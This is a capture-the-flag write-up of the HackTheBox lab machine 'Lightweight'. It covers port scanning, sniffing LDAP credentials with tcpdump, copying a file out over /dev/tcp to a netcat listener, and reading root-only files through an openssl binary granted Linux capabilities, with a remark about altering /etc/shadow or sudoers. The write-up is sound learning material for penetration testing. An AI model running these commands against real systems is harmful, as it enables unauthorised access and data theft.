Summary

Lightweight,a Linux box created by HackTheBox user 0xEA31, was an overall easy-medium difficulty box.It was a fun box that uses Linux capabilities set on tcpdump so we can capture packets on the loopback interface and find credentials in an LDAP session. We then find more credentials in the source code of the web application and finally priv esc to root by abusing a copy of the openssl program that all has Linux caps set on it.

Enumeration

nmap Scan

$ nmap -sC -sV 10.10.10.119

# Nmap 7.70 scan initiated Fri Feb 15 08:15:39 2019 as: nmap -sC -sV -oN nmap/light.nmap 10.10.10.119
Nmap scan report for 10.10.10.119
Host is up (0.14s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
|   256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
|_  256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519)
80/tcp  open  http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after:  2019-06-09T13:32:51
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb 15 08:16:04 2019 -- 1 IP address (1 host up) scanned in 25.19 seconds

We see only port 80, 22 and 389 is open.

Lets open the web

Opening user.php we see This server lets you get in with ssh with username and password as our IP.

so lets try to ssh to that with

ssh 10.10.14.170@10.10.10.119

Low Privilege Shell.

Enumerating that we find out that we might have to do a packet capture on port 389.

So we setup tcpdump

tcpdump -i any port 389 or ldap -v -w capture.pcap

taking the dump and going over that with strings command. we find out the credential for ldapuser2

strings capture.pcap

we find the password as 8bc8251332abe1d7f105d3e53ad39ac2

so lets switch user to ldapuser2

su ldapuser2

Going into the home directory we find the user.txt and we owned user.

Privilege Escalation

In the home director10.10.14.170y we find backup.7z also
Copying it to our local machine using bash ( This can be done by multiple method I choose to do using bash)

On Local Machine : nc -nvlp 9000 > backup.7z
On Remote Maching: "cat backup.7z > /dev/tcp/10.10.14.170/9000"

Trying to unzip it we find it is password protected.

Cracking it on lostmypass we find the password as delete

Unzipping and going through the files we find password for ldapuser1 in status.php

i.e f3ca9d298a553da117442deeb6fa932d

so we can switch to ldapuser1 in the ssh session.

again enumerating in ldapuser1 we find openssl and tcpdump binary in the home directory which is odd.
also check for linux capabilities using

getcap -r / 2>/dev/null

this binary in the result. It seems openssl has empty capabilities

trying to read /root/root.txt using openssl.

./openssl enc -in "/root/root.txt"

we find we can read it. And we have root.txt.

PS: We can get root either by adding us in sudoer or modifying the /etc/shadow using openssl.